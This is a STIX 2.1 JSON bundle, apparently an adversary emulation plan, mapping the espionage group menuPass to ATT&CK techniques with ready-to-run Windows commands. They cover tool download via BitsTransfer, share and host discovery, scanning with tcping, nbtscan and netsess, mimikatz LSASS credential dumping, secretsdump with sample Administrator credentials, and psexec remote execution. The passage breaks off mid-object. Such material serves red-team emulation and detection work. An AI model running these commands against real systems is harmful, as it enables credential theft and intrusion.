{
    "type": "bundle",
    "id": "bundle--5bc68da6-a5d0-4473-842e-4ba672673e5e",
    "objects": [
        {
            "type": "campaign",
            "spec_version": "2.1",
            "id": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "created": "2024-02-04T21:20:01.11877Z",
            "modified": "2024-02-04T21:20:01.11877Z",
            "name": "menuPass",
            "description": "menuPass is thought to be a Chinese cyber espionage group associated with activity directed by elements of the PRC MSS."
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--a750b196-8168-461a-8747-bdc4add107ac",
            "created": "2024-02-04T21:20:01.119068Z",
            "modified": "2024-02-04T21:20:01.119068Z",
            "name": "Ingress Tool Transfer",
            "description": "Pushing tools to compromised host",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1105",
                    "input_arguments": {
                        "bitsadmin_b64_encoded_string": {
                            "default": "TWUEGJDITXAONVPUOWFV\n",
                            "description": "Sample Base 64 Encoded String",
                            "type": "String"
                        },
                        "bitsadmin_remote_ip": {
                            "default": "remote-host\n",
                            "description": "IP or hostname for remote connection",
                            "type": "String"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "psh": {
                                "command": "Start-BitsTransfer -Source \"http://#{bitsadmin_remote_ip}/#{bitsadmin_b64_encoded_string}\" -Destination \"C:\\ProgramData\\temp\\#{bitsadmin_b64_encoded_string}\"\n"
                            }
                        }
                    },
                    "technique_name": "Ingress Tool Transfer"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--84880d05-6337-45ed-9b42-551edaddfb40",
            "created": "2024-02-04T21:20:01.121306Z",
            "modified": "2024-02-04T21:20:01.121306Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--a750b196-8168-461a-8747-bdc4add107ac",
            "target_ref": "ipv4-addr--bed2feb0-c282-5d01-9d1e-10ff289e1fe4"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--bed2feb0-c282-5d01-9d1e-10ff289e1fe4",
            "value": "remote-host\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--81d5ea58-7dab-4540-99c2-9626e817e1dc",
            "created": "2024-02-04T21:20:01.122672Z",
            "modified": "2024-02-04T21:20:01.122672Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--a750b196-8168-461a-8747-bdc4add107ac"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--7877ec4d-3c11-40f2-9650-35261e4ac879",
            "created": "2024-02-04T21:20:01.123197Z",
            "modified": "2024-02-04T21:20:01.123197Z",
            "name": "Network Share Discovery",
            "description": "Display network shares",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1135",
                    "input_arguments": null,
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "net use\n"
                            }
                        }
                    },
                    "technique_name": "Network Share Discovery"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--1c242503-c882-440f-88e5-70e8bf9057c9",
            "created": "2024-02-04T21:20:01.123448Z",
            "modified": "2024-02-04T21:20:01.123448Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--7877ec4d-3c11-40f2-9650-35261e4ac879"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--e132a235-fe43-45c2-a334-2f235a7646b5",
            "created": "2024-02-04T21:20:01.123758Z",
            "modified": "2024-02-04T21:20:01.123758Z",
            "name": "Remote System Discovery",
            "description": "Identify remote systems using net",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1018",
                    "input_arguments": null,
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "net view /domain\n"
                            }
                        }
                    },
                    "technique_name": "Remote System Discovery"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--aa2eec16-55c5-4cb9-bf4a-4dd0ff350e7e",
            "created": "2024-02-04T21:20:01.123959Z",
            "modified": "2024-02-04T21:20:01.123959Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--e132a235-fe43-45c2-a334-2f235a7646b5"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--d19678ac-3bca-475e-89d4-f452bfc2cc2a",
            "created": "2024-02-04T21:20:01.1242Z",
            "modified": "2024-02-04T21:20:01.1242Z",
            "name": "Remote System Discovery",
            "description": "Identify remote system using Powershell",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1018",
                    "input_arguments": {
                        "host_address": {
                            "default": "192.0.2.10\n",
                            "description": "IP for host discovery",
                            "type": "String"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "psh": {
                                "command": "Test-NetConnection \"#{host_address}\"\n"
                            }
                        }
                    },
                    "technique_name": "Remote System Discovery"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--fb7e5c3d-95a7-450b-84fc-bf53b11a0dae",
            "created": "2024-02-04T21:20:01.125996Z",
            "modified": "2024-02-04T21:20:01.125996Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--d19678ac-3bca-475e-89d4-f452bfc2cc2a",
            "target_ref": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3",
            "value": "192.0.2.10\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--19c48629-bdde-4e77-b82d-c9369a46fda5",
            "created": "2024-02-04T21:20:01.129271Z",
            "modified": "2024-02-04T21:20:01.129271Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--d19678ac-3bca-475e-89d4-f452bfc2cc2a"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--b6026408-c815-47ca-bbb0-6b74591badc8",
            "created": "2024-02-04T21:20:01.129632Z",
            "modified": "2024-02-04T21:20:01.129632Z",
            "name": "Network Service Scanning",
            "description": "Enumerate remote hosts for running services using tcping",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1046",
                    "input_arguments": {
                        "tcping_local_path": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Path of tcping.exe",
                            "type": "Path"
                        },
                        "tcping_remote_ip": {
                            "default": "192.0.2.10\n",
                            "description": "Hostname or IP to enumerate with tcping.exe",
                            "type": "String"
                        },
                        "tcping_remote_port": {
                            "default": "445\n",
                            "description": "Port to enumerate with tcping.exe",
                            "type": "String"
                        },
                        "tcping_url": {
                            "default": "https://download.elifulkerson.com//files/tcping/0.39/tcping.exe",
                            "description": "Path to download tcping.exe",
                            "type": "URL"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "\"#{tcping_local_path}\\tcping.exe\" \"#{tcping_remote_ip}\" \"#{tcping_remote_port}\"\n",
                                "payloads": [
                                    "tcping.exe"
                                ]
                            }
                        }
                    },
                    "technique_name": "Network Service Scanning"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--82631617-3e48-49af-97af-3dbb394fe19f",
            "created": "2024-02-04T21:20:01.131765Z",
            "modified": "2024-02-04T21:20:01.131765Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--b6026408-c815-47ca-bbb0-6b74591badc8",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--8c483f85-ee71-4f53-8fff-c6d8bc1dae32",
            "created": "2024-02-04T21:20:01.133593Z",
            "modified": "2024-02-04T21:20:01.133593Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--b6026408-c815-47ca-bbb0-6b74591badc8",
            "target_ref": "url--5d42cf99-d587-58b4-9d50-7b41da147b58"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--5d42cf99-d587-58b4-9d50-7b41da147b58",
            "value": "https://download.elifulkerson.com//files/tcping/0.39/tcping.exe"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--93c93b41-ca89-4c09-9009-1aecc06d2c06",
            "created": "2024-02-04T21:20:01.135285Z",
            "modified": "2024-02-04T21:20:01.135285Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--b6026408-c815-47ca-bbb0-6b74591badc8",
            "target_ref": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3",
            "value": "192.0.2.10\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--6bcb66cf-4ec6-490e-9efb-75c4c8dd2fb1",
            "created": "2024-02-04T21:20:01.138518Z",
            "modified": "2024-02-04T21:20:01.138518Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--b6026408-c815-47ca-bbb0-6b74591badc8",
            "target_ref": "network-traffic--87e99a38-0d32-5832-aea3-59b681d3f0e7"
        },
        {
            "type": "network-traffic",
            "spec_version": "2.1",
            "id": "network-traffic--87e99a38-0d32-5832-aea3-59b681d3f0e7",
            "src_ref": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3",
            "dst_port": 445,
            "protocols": [
                ""
            ]
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--869788dd-c38e-4f02-933c-a54d490c16d0",
            "created": "2024-02-04T21:20:01.138856Z",
            "modified": "2024-02-04T21:20:01.138856Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--b6026408-c815-47ca-bbb0-6b74591badc8"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--814005f7-c8d3-45c8-aea2-45758b2d6e90",
            "created": "2024-02-04T21:20:01.139149Z",
            "modified": "2024-02-04T21:20:01.139149Z",
            "name": "System Network Configuration Discovery",
            "description": "Scan for nameservers and enumerate NetBIOS sessions",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1016",
                    "input_arguments": {
                        "nbt_ip_range": {
                            "default": "192.0.2.34/24\n",
                            "description": "IP Range for nbtscan to enumerate",
                            "type": "String"
                        },
                        "nbtscan_local_path": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Path of nbtscan.exe",
                            "type": "Path"
                        },
                        "nbtscan_url": {
                            "default": "http://unixwiz.net/tools/nbtscan-1.0.35.exe\n",
                            "description": "Path to download nbtscan.exe",
                            "type": "URL"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "\"#{nbtscan_local_path}\\nbtscan.exe\" #{nbt_ip_range}\n",
                                "payloads": [
                                    "nbtscan.exe"
                                ]
                            }
                        }
                    },
                    "technique_name": "System Network Configuration Discovery"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--8e0162bf-2a56-4a5f-9fd8-e72262c16faf",
            "created": "2024-02-04T21:20:01.141699Z",
            "modified": "2024-02-04T21:20:01.141699Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--814005f7-c8d3-45c8-aea2-45758b2d6e90",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--26cc0ce6-a122-479a-a61d-7d8ef9bf5fdf",
            "created": "2024-02-04T21:20:01.145173Z",
            "modified": "2024-02-04T21:20:01.145173Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--814005f7-c8d3-45c8-aea2-45758b2d6e90",
            "target_ref": "url--59101bad-cffe-5e8f-9971-eee1ffa265d8"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--59101bad-cffe-5e8f-9971-eee1ffa265d8",
            "value": "http://unixwiz.net/tools/nbtscan-1.0.35.exe\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--be36c347-b278-42d6-867c-286cefd3209f",
            "created": "2024-02-04T21:20:01.14738Z",
            "modified": "2024-02-04T21:20:01.14738Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--814005f7-c8d3-45c8-aea2-45758b2d6e90",
            "target_ref": "ipv4-addr--450d1ce0-746f-550c-bca7-4a8bf9c42468"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--450d1ce0-746f-550c-bca7-4a8bf9c42468",
            "value": "192.0.2.34/24\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--42a2e643-576b-4601-9f6a-da2bdbf49f0b",
            "created": "2024-02-04T21:20:01.147698Z",
            "modified": "2024-02-04T21:20:01.147698Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--814005f7-c8d3-45c8-aea2-45758b2d6e90"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--9d543214-6476-429a-9ca1-cf12233b808c",
            "created": "2024-02-04T21:20:01.147955Z",
            "modified": "2024-02-04T21:20:01.147955Z",
            "name": "System Network Configuration Discovery",
            "description": "Scan for nameservers and enumerate NetBIOS sessions",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1016",
                    "input_arguments": {
                        "netsess_local_path": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Path of netsess.exe",
                            "type": "Path"
                        },
                        "netsess_remote_ip": {
                            "default": "192.0.2.10\n",
                            "description": "IP or hostname to run netsess.exe against",
                            "type": "String"
                        },
                        "netsess_url": {
                            "default": "http://www.joeware.net/downloads/files/NetSess.zip\n",
                            "description": "Path to download netsess.exe",
                            "type": "URL"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "\"#{netsess_local_path}\\netsess.exe\" #{netsess_remote_ip}\n",
                                "payloads": [
                                    "netsess.exe"
                                ]
                            }
                        }
                    },
                    "technique_name": "System Network Configuration Discovery"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--04755e66-0588-4145-8548-b9adafc40a10",
            "created": "2024-02-04T21:20:01.150488Z",
            "modified": "2024-02-04T21:20:01.150488Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--9d543214-6476-429a-9ca1-cf12233b808c",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--91501e6c-31eb-4109-aca9-04d8f40f3c53",
            "created": "2024-02-04T21:20:01.153393Z",
            "modified": "2024-02-04T21:20:01.153393Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--9d543214-6476-429a-9ca1-cf12233b808c",
            "target_ref": "url--d62e4747-0a79-599a-bc98-9081bbc5a6b1"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--d62e4747-0a79-599a-bc98-9081bbc5a6b1",
            "value": "http://www.joeware.net/downloads/files/NetSess.zip\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--3ba77175-c842-46ee-8f62-4554a5d43c25",
            "created": "2024-02-04T21:20:01.154558Z",
            "modified": "2024-02-04T21:20:01.154558Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--9d543214-6476-429a-9ca1-cf12233b808c",
            "target_ref": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--ac338119-a176-512b-81fa-6722586055d3",
            "value": "192.0.2.10\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--cb48ddc2-b745-42a0-a8af-f330e939d169",
            "created": "2024-02-04T21:20:01.154823Z",
            "modified": "2024-02-04T21:20:01.154823Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--9d543214-6476-429a-9ca1-cf12233b808c"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--ffb50e17-cb3c-4424-a4e7-99e3885f22cc",
            "created": "2024-02-04T21:20:01.155073Z",
            "modified": "2024-02-04T21:20:01.155073Z",
            "name": "OS Credential Dumping",
            "description": "menuPass has used mimikatz.exe to dump credentials locally",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1003.001",
                    "input_arguments": {
                        "mimikatz_arch": {
                            "default": "x64",
                            "description": "Architecture folder (Win32 or x64)",
                            "type": "String"
                        },
                        "mimikatz_local_path": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Path of mimikatz",
                            "type": "Path"
                        },
                        "mimikatz_module": {
                            "default": "sekurlsa::logonpasswords\n",
                            "description": "Mimikatz module",
                            "type": "String"
                        },
                        "mimikatz_url": {
                            "default": "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200917/mimikatz_trunk.zip",
                            "description": "URL to download mimikatz.exe zip",
                            "type": "URL"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "\"#{mimikatz_local_path}\\#{mimikatz_arch}\\mimikatz.exe\" \"#{mimikatz_module}\"\n",
                                "payloads": [
                                    "mimikatz.exe"
                                ]
                            }
                        }
                    },
                    "technique_name": "OS Credential Dumping: LSASS Memory"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--c9a47d6d-64dd-41f6-84a0-3f1137731022",
            "created": "2024-02-04T21:20:01.156298Z",
            "modified": "2024-02-04T21:20:01.156298Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--ffb50e17-cb3c-4424-a4e7-99e3885f22cc",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--dd0ba238-8f5b-461f-a4cb-91869b28e5d2",
            "created": "2024-02-04T21:20:01.161662Z",
            "modified": "2024-02-04T21:20:01.161662Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--ffb50e17-cb3c-4424-a4e7-99e3885f22cc",
            "target_ref": "url--212d6210-2781-5f3e-af64-fe9827a70cfc"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--212d6210-2781-5f3e-af64-fe9827a70cfc",
            "value": "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200917/mimikatz_trunk.zip"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--bb845c8d-3c8c-44f2-a08d-71df04e9e4cd",
            "created": "2024-02-04T21:20:01.167768Z",
            "modified": "2024-02-04T21:20:01.167768Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--ffb50e17-cb3c-4424-a4e7-99e3885f22cc"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--fe3d4de1-50bf-4241-9546-72dc757e696f",
            "created": "2024-02-04T21:20:01.168106Z",
            "modified": "2024-02-04T21:20:01.168106Z",
            "name": "OS Credential Dumping",
            "description": "menuPass has used secretsdump.exe to dump credentials remotely",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1003.002",
                    "input_arguments": {
                        "secretsdump_domain": {
                            "default": "DOMAIN",
                            "description": "Domain for secretsdump.exe command",
                            "type": "String"
                        },
                        "secretsdump_local_path": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Path of secretsdump.exe",
                            "type": "Path"
                        },
                        "secretsdump_pass": {
                            "default": "Password123",
                            "description": "Password for secretsdump.exe command",
                            "type": "String"
                        },
                        "secretsdump_remote_host": {
                            "default": "192.0.2.10",
                            "description": "Hostname or IP for secretsdump.exe connection",
                            "type": "String"
                        },
                        "secretsdump_url": {
                            "default": "https://github.com/ropnop/impacket_static_binaries/releases/download/0.9.22.dev-binaries/secretsdump_windows.exe",
                            "description": "URL to download secretsdump.exe binary",
                            "type": "URL"
                        },
                        "secretsdump_user": {
                            "default": "Administrator",
                            "description": "User for secretsdump.exe command",
                            "type": "String"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "\"#{secretsdump_local_path}\\secretsdump.exe\" \"#{secretsdump_domain}\"/\"#{secretsdump_user}\":\"#{secretsdump_pass}\"@\"#{secretsdump_remote_host}\"\n",
                                "payloads": [
                                    "secretsdump.exe"
                                ]
                            }
                        }
                    },
                    "technique_name": "OS Credential Dumping: Security Account Manager"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--4da44294-f340-43de-929d-525b65fcfd18",
            "created": "2024-02-04T21:20:01.175099Z",
            "modified": "2024-02-04T21:20:01.175099Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--fe3d4de1-50bf-4241-9546-72dc757e696f",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--64c47c35-7822-4865-925a-07226290735a",
            "created": "2024-02-04T21:20:01.176471Z",
            "modified": "2024-02-04T21:20:01.176471Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--fe3d4de1-50bf-4241-9546-72dc757e696f",
            "target_ref": "url--5a632f96-74b8-5fe6-a20b-a9a29b981e9e"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--5a632f96-74b8-5fe6-a20b-a9a29b981e9e",
            "value": "https://github.com/ropnop/impacket_static_binaries/releases/download/0.9.22.dev-binaries/secretsdump_windows.exe"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--6f689f82-a7bc-4ee3-b812-614de246d870",
            "created": "2024-02-04T21:20:01.178567Z",
            "modified": "2024-02-04T21:20:01.178567Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--fe3d4de1-50bf-4241-9546-72dc757e696f",
            "target_ref": "domain-name--302847ad-c98b-5aa3-8b6e-353f5f94757d"
        },
        {
            "type": "domain-name",
            "spec_version": "2.1",
            "id": "domain-name--302847ad-c98b-5aa3-8b6e-353f5f94757d",
            "value": "DOMAIN"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--41d9e23e-da36-42ab-a122-bafcd6d20470",
            "created": "2024-02-04T21:20:01.180868Z",
            "modified": "2024-02-04T21:20:01.180868Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--fe3d4de1-50bf-4241-9546-72dc757e696f",
            "target_ref": "user-account--e9dbdf7c-3f27-52df-805a-90834ad4853f"
        },
        {
            "type": "user-account",
            "spec_version": "2.1",
            "id": "user-account--e9dbdf7c-3f27-52df-805a-90834ad4853f",
            "account_login": "Administrator"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--e2a5d8e0-3460-4112-bedd-2c27169129d4",
            "created": "2024-02-04T21:20:01.183136Z",
            "modified": "2024-02-04T21:20:01.183136Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--fe3d4de1-50bf-4241-9546-72dc757e696f",
            "target_ref": "user-account--623d46a6-084d-4626-b05a-e91483cd936d"
        },
        {
            "type": "user-account",
            "spec_version": "2.1",
            "id": "user-account--623d46a6-084d-4626-b05a-e91483cd936d",
            "credential": "Password123"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--febacc09-995b-43ee-be94-63db42fa380f",
            "created": "2024-02-04T21:20:01.188621Z",
            "modified": "2024-02-04T21:20:01.188621Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--fe3d4de1-50bf-4241-9546-72dc757e696f",
            "target_ref": "ipv4-addr--a2fbe2c6-009e-52e0-b452-90b71e3109c2"
        },
        {
            "type": "ipv4-addr",
            "spec_version": "2.1",
            "id": "ipv4-addr--a2fbe2c6-009e-52e0-b452-90b71e3109c2",
            "value": "192.0.2.10"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--83e0b6d5-5017-4643-98d1-d7027ee4d499",
            "created": "2024-02-04T21:20:01.18886Z",
            "modified": "2024-02-04T21:20:01.18886Z",
            "relationship_type": "uses",
            "source_ref": "campaign--b5192070-dff1-4134-bf66-c6b87c7498af",
            "target_ref": "attack-pattern--fe3d4de1-50bf-4241-9546-72dc757e696f"
        },
        {
            "type": "attack-pattern",
            "spec_version": "2.1",
            "id": "attack-pattern--4b1748e5-532c-453c-b195-557ce5550fef",
            "created": "2024-02-04T21:20:01.189055Z",
            "modified": "2024-02-04T21:20:01.189055Z",
            "name": "Service Execution",
            "description": "Using compiled psexec.py to achieve remote code execution",
            "extensions": {
                "extension-definition--cb1e417d-8e64-4c02-97e3-d2f6ea6182b0": {
                    "attack_id": "T1569.002",
                    "input_arguments": {
                        "psexec_cmd": {
                            "default": "-c d.exe\n",
                            "description": "PsExec argument for specifying executable",
                            "type": "String"
                        },
                        "psexec_local_path": {
                            "default": "C:\\Windows\\Temp\n",
                            "description": "Path of psexec.exe",
                            "type": "Path"
                        },
                        "psexec_password": {
                            "default": "badpassword123\n",
                            "description": "Password for psexec authentication",
                            "type": "String"
                        },
                        "psexec_remote_host": {
                            "default": "192.0.2.10\n",
                            "description": "IP or hostname for PsExec connection",
                            "type": "String"
                        },
                        "psexec_url": {
                            "default": "https://github.com/ropnop/impacket_static_binaries/releases/download/0.9.22.dev-binaries/psexec_windows.exe",
                            "description": "URL to download psexec.exe binary",
                            "type": "URL"
                        },
                        "psexec_user": {
                            "default": "Administrator\n",
                            "description": "User for psexec authentication",
                            "type": "String"
                        }
                    },
                    "platforms": {
                        "windows": {
                            "cmd": {
                                "command": "\"#{psexec_local_path}\\psexec.exe\" \"#{psexec_user}\":\"#{psexec_password}\"@\"#{psexec_remote_host}\" \"#{psexec_cmd}\"\n",
                                "payloads": [
                                    "psexec.exe"
                                ]
                            }
                        }
                    },
                    "technique_name": "System Services: Service Execution"
                }
            }
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--aa7d4669-3ad1-4072-a61c-2c51506c9be8",
            "created": "2024-02-04T21:20:01.190307Z",
            "modified": "2024-02-04T21:20:01.190307Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--4b1748e5-532c-453c-b195-557ce5550fef",
            "target_ref": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77"
        },
        {
            "type": "directory",
            "spec_version": "2.1",
            "id": "directory--13a63c15-6a3f-51c9-80be-2e126dbb3d77",
            "path": "C:\\Windows\\Temp\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--78bf705f-ae9a-40cb-a47a-bc13f54f86ca",
            "created": "2024-02-04T21:20:01.191158Z",
            "modified": "2024-02-04T21:20:01.191158Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--4b1748e5-532c-453c-b195-557ce5550fef",
            "target_ref": "url--c8eb1d27-0f6b-5a5c-b5be-31d75c71db35"
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--c8eb1d27-0f6b-5a5c-b5be-31d75c71db35",
            "value": "https://github.com/ropnop/impacket_static_binaries/releases/download/0.9.22.dev-binaries/psexec_windows.exe"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--d2808595-8201-4a14-b81f-c64e336aee58",
            "created": "2024-02-04T21:20:01.193715Z",
            "modified": "2024-02-04T21:20:01.193715Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--4b1748e5-532c-453c-b195-557ce5550fef",
            "target_ref": "user-account--edd59c04-d2ad-511d-9f7b-63a53e1ddc75"
        },
        {
            "type": "user-account",
            "spec_version": "2.1",
            "id": "user-account--edd59c04-d2ad-511d-9f7b-63a53e1ddc75",
            "account_login": "Administrator\n"
        },
        {
            "type": "relationship",
            "spec_version": "2.1",
            "id": "relationship--44bd3a4b-9763-467e-9005-418208ea6d40",
            "created": "2024-02-04T21:20:01.196434Z",
            "modified": "2024-02-04T21:20:01.196434Z",
            "relationship_type": "uses",
            "source_ref": "attack-pattern--4b1748e5-532c-453c-b195-557ce5550fef",
